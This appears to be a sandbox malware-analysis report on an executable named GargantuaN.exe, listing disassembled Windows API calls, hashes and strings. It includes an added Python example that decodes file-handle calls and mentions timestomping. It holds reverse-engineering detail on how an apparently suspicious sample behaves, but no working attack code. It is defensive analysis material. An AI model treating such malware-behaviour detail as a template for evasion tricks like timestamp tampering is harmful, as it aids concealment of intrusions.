                                                        • Opcode ID: 3d35b96dd97eb73efdeca30ad8807184fa19b366d23b822fcfaa42f2615256b2
                                                        • Instruction ID: 99395519e481f15b24fc858dfe408ae12bc11787cf721654d0c25bb5cbb3fc8a
                                                        • Opcode Fuzzy Hash: 3d35b96dd97eb73efdeca30ad8807184fa19b366d23b822fcfaa42f2615256b2
                                                        • Instruction Fuzzy Hash: 95E04F709107429EDB20AF34D849B127AD4AF04F05F14885DE8DED3640D6B4D5448B70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AdjustPointer$_abort
                                                        • String ID:
                                                        • API String ID: 2252061734-0
                                                        • Opcode ID: f16173ea0127cacccd18f3d5beca992c249a6a9b5aee6106d2f62467f9cde439
                                                        • Instruction ID: 53716749707f884ab92222f40868c43cf42f610c5a2f55b5b6eb57ce002c13fd
                                                        • Opcode Fuzzy Hash: f16173ea0127cacccd18f3d5beca992c249a6a9b5aee6106d2f62467f9cde439
                                                        • Instruction Fuzzy Hash: 4E519172601252EFDB299F14D846BBA77A4FF64310F28852DE849876A1F731ED80D7B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00D7BF39
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D7BF5C
                                                          • Part of subcall function 00D78E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7CA2C,00000000,?,00D76CBE,?,00000008,?,00D791E0,?,?,?), ref: 00D78E38
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D7BF82
                                                        • _free.LIBCMT ref: 00D7BF95
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7BFA4
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                        • String ID:
                                                        • API String ID: 336800556-0
                                                        • Opcode ID: 0c5860853f9ffcac8b7314ac4747f3d6f1ed4d730f3f84b64ea43a4846640230
                                                        • Instruction ID: 17cae44f02b9ef15a96ba5742c920d30fd22a9dcb299cfdee67341a864f05086
                                                        • Opcode Fuzzy Hash: 0c5860853f9ffcac8b7314ac4747f3d6f1ed4d730f3f84b64ea43a4846640230
                                                        • Instruction Fuzzy Hash: 390184726157157F23211A765C4DE7BAA6DDEC2FB1319812AF90CC2241FF62CD0196B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,00D791AD,00D7B188,?,00D79813,00000001,00000364,?,00D73F73,00000050,?,00D91030,00000200), ref: 00D7986E
                                                        • _free.LIBCMT ref: 00D798A3
                                                        • _free.LIBCMT ref: 00D798CA
                                                        • SetLastError.KERNEL32(00000000,?,00D91030,00000200), ref: 00D798D7
                                                        • SetLastError.KERNEL32(00000000,?,00D91030,00000200), ref: 00D798E0
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID:
                                                        • API String ID: 3170660625-0
                                                        • Opcode ID: f4a6b9164906635303fec3b25caca804e5af6e6bd815d4fb9ce04ac114778dde
                                                        • Instruction ID: 77a78832da5f4e360aa2ef499bd69043ac7ff1441e02d4e9336c76328ceca304
                                                        • Opcode Fuzzy Hash: f4a6b9164906635303fec3b25caca804e5af6e6bd815d4fb9ce04ac114778dde
                                                        • Instruction Fuzzy Hash: 0601F437254B016FC2222728ACAAD2FA629DFD27707258236F50DD2292FE20CD015272
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00D611CF: ResetEvent.KERNEL32(?), ref: 00D611E1
                                                          • Part of subcall function 00D611CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00D611F5
                                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00D60F21
                                                        • CloseHandle.KERNEL32(?,?), ref: 00D60F3B
                                                        • DeleteCriticalSection.KERNEL32(?), ref: 00D60F54
                                                        • CloseHandle.KERNEL32(?), ref: 00D60F60
                                                        • CloseHandle.KERNEL32(?), ref: 00D60F6C
                                                          • Part of subcall function 00D60FE4: WaitForSingleObject.KERNEL32(?,000000FF,00D61206,?), ref: 00D60FEA
                                                          • Part of subcall function 00D60FE4: GetLastError.KERNEL32(?), ref: 00D60FF6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                        • String ID:
                                                        • API String ID: 1868215902-0
                                                        • Opcode ID: cd44e04ab0714bf506a621956286a0b2110a8e07921df53470ad78cbfa5ff414
                                                        • Instruction ID: 1a5db6e9eb446457f191e82e679214e015170d91197aa11d71290682e5fd7807
                                                        • Opcode Fuzzy Hash: cd44e04ab0714bf506a621956286a0b2110a8e07921df53470ad78cbfa5ff414
                                                        • Instruction Fuzzy Hash: CC015E72110744EFC7229F64DC85BCABBA9FB08B10F000929F26A92260CB757A44DBB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _free.LIBCMT ref: 00D7C817
                                                          • Part of subcall function 00D78DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?), ref: 00D78DE2
                                                          • Part of subcall function 00D78DCC: GetLastError.KERNEL32(?,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?,?), ref: 00D78DF4
                                                        • _free.LIBCMT ref: 00D7C829
                                                        • _free.LIBCMT ref: 00D7C83B
                                                        • _free.LIBCMT ref: 00D7C84D
                                                        • _free.LIBCMT ref: 00D7C85F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 13dcd67fe1cc59c523cf9d6fdcc5b218288a0c98c53ce973c68d42a6f9b68a17
                                                        • Instruction ID: 0b5474b0f4ff3df22e6e62ab315b681de244ef1b7c370a1a71d134b8066c4118
                                                        • Opcode Fuzzy Hash: 13dcd67fe1cc59c523cf9d6fdcc5b218288a0c98c53ce973c68d42a6f9b68a17
                                                        • Instruction Fuzzy Hash: E7F01272564600AFC621DB69F48AC1673E9EB14724768A81EF10CD7652EB70FC80CB75
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00D61FE5
                                                        • _wcslen.LIBCMT ref: 00D61FF6
                                                        • _wcslen.LIBCMT ref: 00D62006
                                                        • _wcslen.LIBCMT ref: 00D62014
                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00D5B371,?,?,00000000,?,?,?), ref: 00D6202F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$CompareString
                                                        • String ID:
                                                        • API String ID: 3397213944-0
                                                        • Opcode ID: ab3806a107eb196b9c563d9e1722c10b5f8b193f03206b9e56a353c0849a1994
                                                        • Instruction ID: 6ee291bb878294b50c5a71b3bedd59a3cb5db2419d4a9bc0e809a1b540e31f90
                                                        • Opcode Fuzzy Hash: ab3806a107eb196b9c563d9e1722c10b5f8b193f03206b9e56a353c0849a1994
                                                        • Instruction Fuzzy Hash: 9DF01732008114BFCF226F55EC09DDA7F26EB44B60B21C515FA1A9A061DB72D6A1EAB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _free.LIBCMT ref: 00D7891E
                                                          • Part of subcall function 00D78DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?), ref: 00D78DE2
                                                          • Part of subcall function 00D78DCC: GetLastError.KERNEL32(?,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?,?), ref: 00D78DF4
                                                        • _free.LIBCMT ref: 00D78930
                                                        • _free.LIBCMT ref: 00D78943
                                                        • _free.LIBCMT ref: 00D78954
                                                        • _free.LIBCMT ref: 00D78965
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: _swprintf
                                                        • String ID: %ls$%s: %s
                                                        • API String ID: 589789837-2259941744
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\GargantuaN.exe,00000104), ref: 00D77FAE
                                                        • _free.LIBCMT ref: 00D78079
                                                        • _free.LIBCMT ref: 00D78083
                                                        Strings
                                                        Similarity
                                                        • API ID: _free$FileModuleName
                                                        • String ID: C:\Users\user\AppData\Local\Temp\GargantuaN.exe
                                                        • API String ID: 2506810119-2795930919
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00D731FB
                                                        • _abort.LIBCMT ref: 00D73306
                                                        Strings
                                                        Similarity
                                                        • API ID: EncodePointer_abort
                                                        • String ID: MOC$RCC
                                                        • API String ID: 948111806-2084237596
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D57406
                                                          • Part of subcall function 00D53BBA: __EH_prolog.LIBCMT ref: 00D53BBF
                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00D574CD
                                                          • Part of subcall function 00D57A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D57AAB
                                                          • Part of subcall function 00D57A9C: GetLastError.KERNEL32 ref: 00D57AF1
                                                          • Part of subcall function 00D57A9C: CloseHandle.KERNEL32(?), ref: 00D57B00
                                                        Strings
                                                        Similarity
                                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                        • API String ID: 3813983858-639343689
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00D51316: GetDlgItem.USER32(00000000,00003021), ref: 00D5135A
                                                          • Part of subcall function 00D51316: SetWindowTextW.USER32(00000000,00D835F4), ref: 00D51370
                                                        • EndDialog.USER32(?,00000001), ref: 00D6AD98
                                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00D6ADAD
                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D6ADC2
                                                        Strings
                                                        Similarity
                                                        • API ID: ItemText$DialogWindow
                                                        • String ID: ASKNEXTVOL
                                                        • API String ID: 445417207-3402441367
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __fprintf_l.LIBCMT ref: 00D5D954
                                                        • _strncpy.LIBCMT ref: 00D5D99A
                                                          • Part of subcall function 00D61DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D91030,00000200,00D5D928,00000000,?,00000050,00D91030), ref: 00D61DC4
                                                        Strings
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                        • String ID: $%s$@%s
                                                        • API String ID: 562999700-834177443
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00D5AC5A,00000008,?,00000000,?,00D5D22D,?,00000000), ref: 00D60E85
                                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D5AC5A,00000008,?,00000000,?,00D5D22D,?,00000000), ref: 00D60E8F
                                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D5AC5A,00000008,?,00000000,?,00D5D22D,?,00000000), ref: 00D60E9F
                                                        Strings
                                                        • Thread pool initialization failed., xrefs: 00D60EB7
                                                        Similarity
                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                        • String ID: Thread pool initialization failed.
                                                        • API String ID: 3340455307-2182114853
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00D51316: GetDlgItem.USER32(00000000,00003021), ref: 00D5135A
                                                          • Part of subcall function 00D51316: SetWindowTextW.USER32(00000000,00D835F4), ref: 00D51370
                                                        • EndDialog.USER32(?,00000001), ref: 00D6B2BE
                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D6B2D6
                                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 00D6B304
                                                        Strings
                                                        Similarity
                                                        • API ID: ItemText$DialogWindow
                                                        • String ID: GETPASSWORD1
                                                        • API String ID: 445417207-3292211884
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                        • API String ID: 0-56093855
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00D6DBF4
                                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D6DC30
                                                        Strings
                                                        Similarity
                                                        • API ID: EnvironmentVariable
                                                        • String ID: sfxcmd$sfxpar
                                                        • API String ID: 1431749950-3493335439
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: __alldvrm$_strrchr
                                                        • String ID:
                                                        • API String ID: 1036877536-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00D57F69,?,?,?), ref: 00D5A3FA
                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00D57F69,?), ref: 00D5A43E
                                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00D57F69,?,?,?,?,?,?,?), ref: 00D5A4BF
                                                        • CloseHandle.KERNEL32(?,?,?,00000800,?,00D57F69,?,?,?,?,?,?,?,?,?,?), ref: 00D5A4C6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: File$Create$CloseHandleTime
                                                        • String ID:
                                                        • API String ID: 2287278272-0
                                                        • Opcode ID: 3b9d21631c9d271b551c86c99d455cb7c96d8c2b9ab8d554b5487ac715ea301f
                                                        • Instruction ID: 60da8625b3da1158e79b03a1d4f955951d021b4e797119153ecb89fb1cea89b8
                                                        • Opcode Fuzzy Hash: 3b9d21631c9d271b551c86c99d455cb7c96d8c2b9ab8d554b5487ac715ea301f
                                                        • Instruction Fuzzy Hash: 2A41E1301483919BEB21DFA8DC45BAEBBE49B80705F080A19BDD5D7290D6A49A0C9B73
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

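                                                        The function records in this listing give each call in the report's own `Name.MODULE(args), ref: addr` layout, with `?` for stack slots the analyzer could not resolve and `Part of subcall function` for calls reached through a callee. The Python below is an added example, not code from the Joe Sandbox report or from the analyzed sample: it parses that layout, decodes the CreateFileW arguments of the record above using the Win32 SDK constant values (0x40000000 = GENERIC_WRITE, 3 = FILE_SHARE_READ|FILE_SHARE_WRITE, 3 = OPEN_EXISTING, 0x02000000 = FILE_FLAG_BACKUP_SEMANTICS), and pairs each open with the SetFileTime that follows it before the handle is closed. The embedded record is constructed from the lines above; the function names and the pairing heuristic are the example's own assumptions, as is the reading of this module as a self-extractor stub restoring timestamps.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: the "APIs" block of the CreateFileW/SetFileTime record,
# copied in the report's layout (assumed to be a self-extractor stub).
SAMPLE_RECORD = """\
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00D57F69,?,?,?), ref: 00D5A3FA
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00D57F69,?), ref: 00D5A43E
• SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00D57F69,?,?,?,?,?,?,?), ref: 00D5A4BF
• CloseHandle.KERNEL32(?,?,?,00000800,?,00D57F69,?,?,?,?,?,?,?,?,?,?), ref: 00D5A4C6
  • Part of subcall function 00D5A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D5A325,?), ref: 00D5A501
"""

# One line of the "APIs" block; the argument list is optional because CRT
# entries such as "__freea.LIBCMT ref: 00D7CA79" carry none.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 SDK values (winnt.h / fileapi.h) used to decode CreateFileW arguments.
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS = {0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED",
         0x20000000: "FILE_FLAG_NO_BUFFERING", 0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN",
         0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
         0x00000080: "FILE_ATTRIBUTE_NORMAL"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report printed '?'
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee address for "Part of subcall" lines


def parse_api_block(text: str) -> List[ApiCall]:
    """Parse every call line of an "APIs" block; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if raw is None else [
            None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16),
                             int(m.group("sub"), 16) if m.group("sub") else None))
    return calls


def flag_names(value: int, table: Dict[int, str]) -> List[str]:
    """Expand a bitmask into SDK names, keeping any unknown bits as hex."""
    names = [name for bit, name in table.items() if value & bit]
    unknown = value & ~sum(table)
    if unknown:
        names.append(hex(unknown))
    return names


def decode_createfile(call: ApiCall) -> Dict[str, object]:
    """Decode dwDesiredAccess, dwShareMode, dwCreationDisposition, dwFlagsAndAttributes."""
    assert call.api == "CreateFileW" and len(call.args) >= 6
    access, share, disposition, flags = call.args[1], call.args[2], call.args[4], call.args[5]
    return {
        "access": flag_names(access, GENERIC) if access is not None else ["?"],
        "share": flag_names(share, SHARE) if share is not None else ["?"],
        "disposition": DISPOSITION.get(disposition, str(disposition)),
        "flags": flag_names(flags, FLAGS) if flags is not None else ["?"],
        # Directories can only be opened with FILE_FLAG_BACKUP_SEMANTICS.
        "directory_capable": flags is not None and bool(flags & 0x02000000),
    }


def find_timestamp_writes(calls: List[ApiCall]) -> List[Dict[str, object]]:
    """Pair top-level CreateFileW calls with the SetFileTime that follows before
    the next CloseHandle. The report lists calls in address order, which for
    straight-line code matches call order; two opens before one SetFileTime
    usually means alternative branches rather than two sequential opens."""
    findings, pending = [], []
    for c in calls:
        if c.subcall_of is not None:
            continue
        if c.api == "CreateFileW":
            pending.append(c)
        elif c.api == "SetFileTime":
            for opener in pending:
                d = decode_createfile(opener)
                findings.append({"open_ref": opener.ref, "settime_ref": c.ref,
                                 "writes_existing": d["disposition"] == "OPEN_EXISTING"
                                 and "GENERIC_WRITE" in d["access"],
                                 "directory_capable": d["directory_capable"]})
            pending = []
        elif c.api == "CloseHandle":
            pending = []
    return findings


if __name__ == "__main__":
    for f in find_timestamp_writes(parse_api_block(SAMPLE_RECORD)):
        print(f)
```

                                                        A GENERIC_WRITE open of an existing object with FILE_FLAG_BACKUP_SEMANTICS followed by SetFileTime is what an archive extractor does to restore directory timestamps, and it is also exactly the call shape of timestomping; the decoded arguments tell an analyst which it is only together with the file names, which the report shows as unresolved `?` slots here.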
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID:
                                                        • API String ID: 176396367-0
                                                        • Opcode ID: 7a414a45e5cc2c301085f6307c7558d90a78c41e13eb4950f7983b4bbac35cc9
                                                        • Instruction ID: 1ba8084a4df059f338290daab463eff8ab579741012630292a68a7686f501f5f
                                                        • Opcode Fuzzy Hash: 7a414a45e5cc2c301085f6307c7558d90a78c41e13eb4950f7983b4bbac35cc9
                                                        • Instruction Fuzzy Hash: 7341D8759006699BCB25AF68CC46ADF7BB8EF01311F044119FD46F7241DB70AE498BB4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D791E0,?,00000000,?,00000001,?,?,00000001,00D791E0,?), ref: 00D7C9D5
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D7CA5E
